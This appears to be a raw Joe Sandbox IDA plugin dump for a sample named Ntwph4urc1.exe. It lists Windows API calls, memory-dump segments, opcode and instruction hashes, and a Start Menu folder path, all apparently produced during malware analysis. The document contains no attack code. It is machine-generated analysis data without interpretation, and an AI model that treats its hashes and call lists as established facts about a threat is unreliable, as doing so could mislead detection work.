                                            • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                            • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,?,00405AC4,?,?,00000000,00405C9A,?,?,?,?), ref: 00405EC4
                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                            • Instruction ID: 9f802252afbb128bb6d2778500f244350c46036787b5d1505cff2c7139ff2394
                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                            • Instruction Fuzzy Hash: 3CD0C9725055306BC2102728EE0C89BBB55EB64271B114A35F9A5A62B0CB304C528A98
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 004059A8
                                            • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059B6
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                            • Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
                                            • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                            • Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D
                                            APIs
                                            • CreateFileA.KERNELBASE(00000000), ref: 74352BB7
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 25110d3507d358ffc5cd280814017adf28e863bc9de9a665d6a16defacd6db30
                                            • Instruction ID: cd92722eb3436656978f7a4a516ca1140f7587330fd822ecd0a7e0a5635cb8a4
                                            • Opcode Fuzzy Hash: 25110d3507d358ffc5cd280814017adf28e863bc9de9a665d6a16defacd6db30
                                            • Instruction Fuzzy Hash: 874150B6610204EFEB259F76D984FA9F77DEF88324F21442AE80DC7124DA34A6418FD1
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                            • Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                            • Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8
                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,00000004,00000000), ref: 00405FAA
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                            • Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                            • Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8
                                            APIs
                                            • VirtualProtect.KERNELBASE(7435505C,00000004,00000040,7435504C), ref: 743529FD
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 7817a52313101eed9ba15f80a0cd21d0d2f682d1a63bd3ee3eda5b534679cbc4
                                            • Instruction ID: 95cde8ab76d2f055d79c9fb84d4f0010206a1f236877cff6aac9b0d10b395a20
                                            • Opcode Fuzzy Hash: 7817a52313101eed9ba15f80a0cd21d0d2f682d1a63bd3ee3eda5b534679cbc4
                                            • Instruction Fuzzy Hash: E9F07FB2761280DEC350CF3AC444BAABBECF71C225B22452BF18CD7259E33461448B91
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                            • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                            • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                            • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                            APIs
                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                            • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                            • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                            • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                            APIs
                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403468
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                            APIs
                                            • SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                            • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                            • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                            • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                            • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                            • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                            • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                            APIs
                                            • Sleep.KERNELBASE(00000000), ref: 004014EA
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                            • Instruction ID: a18cf0c9a9b021ee27972f2e0a35f90bb7c2f66644072f7244457554decb08b2
                                            • Opcode Fuzzy Hash: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                            • Instruction Fuzzy Hash: 0AD05EB3A201008BC700DFB8BE8545E73B8EA903193308837D452E2091E6B889518629
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404884
                                            • SetWindowTextW.USER32(00000000,?), ref: 004048AE
                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040495F
                                            • CoTaskMemFree.OLE32(00000000), ref: 0040496A
                                            • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 0040499C
                                            • lstrcatW.KERNEL32(?,Call), ref: 004049A8
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049BA
                                              • Part of subcall function 00405A38: GetDlgItemTextW.USER32(?,?,00000400,004049F1), ref: 00405A4B
                                              • Part of subcall function 0040669D: CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                              • Part of subcall function 0040669D: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                              • Part of subcall function 0040669D: CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                              • Part of subcall function 0040669D: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                            • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404A7D
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A98
                                              • Part of subcall function 00404BF1: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                              • Part of subcall function 00404BF1: wsprintfW.USER32 ref: 00404C9B
                                              • Part of subcall function 00404BF1: SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                            • API String ID: 2624150263-647811358
                                            • Opcode ID: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                            • Instruction ID: 411b0bed4dd1c8854bcfe70218cd405116d93f5cc49f5f9e093397eef6854a11
                                            • Opcode Fuzzy Hash: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                            • Instruction Fuzzy Hash: 78A17FB1A00209ABDB11EFA5CD81AAF77B8EF84314F10843BF601B62D1D77C99418F69
                                            APIs
                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00402261
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CreateInstance
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                            • API String ID: 542301482-2757888794
                                            • Opcode ID: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                            • Instruction ID: 318f5a272383e4943f9a7a1f828131c4cf43be91e798f39f03958dcf779540d2
                                            • Opcode Fuzzy Hash: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                            • Instruction Fuzzy Hash: 67412771A00208AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54
                                            APIs
                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                            • Instruction ID: c1f6bc4fbd4392edc64dd94dfb26af21a0adc514685abdce03c7c09792edecab
                                            • Opcode Fuzzy Hash: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                            • Instruction Fuzzy Hash: FAF08CB1A00104ABC700DFA4DD499AEB378EF10324F70857BE911F21E0D7B89E109B3A
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DC8
                                            • GetDlgItem.USER32(?,00000408), ref: 00404DD5
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E21
                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E38
                                            • SetWindowLongW.USER32(?,000000FC,004053CA), ref: 00404E52
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E66
                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E7A
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404E8F
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E9B
                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EAD
                                            • DeleteObject.GDI32(00000110), ref: 00404EB2
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EDD
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EE9
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F84
                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FB4
                                              • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FC8
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FF6
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405004
                                            • ShowWindow.USER32(?,00000005), ref: 00405014
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405115
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405177
                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040518C
                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B0
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D3
                                            • ImageList_Destroy.COMCTL32(?), ref: 004051E8
